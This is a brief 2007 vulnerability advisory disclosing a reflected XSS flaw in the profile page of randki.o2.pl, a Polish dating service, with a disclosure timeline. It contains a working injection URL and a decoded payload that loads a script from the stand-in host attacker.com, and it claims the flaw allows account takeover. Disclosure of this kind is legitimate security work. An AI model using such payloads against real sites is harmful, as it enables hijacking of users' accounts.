kanedaaa... ... borys ... bohater ...
+ Subject:
XSS bug for randki.o2.pl
+ Version:
2007.03.04
+ Discovered by:
Kanedaaa: http://kaneda.bohater.net
+ randki.o2.pl Description:
randki.o2.pl is "date service", a part of o2.pl the most famous Polish web portal.
+ Description:
XSS IN:
http://randki.o2.pl/profil.php?id_r=946245%22%3E%3Cscript/XSS%20SRC=http://attacker.com/xss.js%3E%3C/SCRIPT%3E
The sent data:
"><script/XSS SRC=http://attacker.com/xss.js></SCRIPT>
That is a possibility to take over an user account from the date service at http://randki.o2.pl when the logged user would click at specially crafted URL.
Timeline:
2007.03.04 bug discovered
2007.03.05 "/" bug sent via http://kontakt.o2.pl/
Original Advisory: http://kaneda.bohater.net/security/20070304-xss-randki.o2.pl.php
Check my other bugs in security section: Security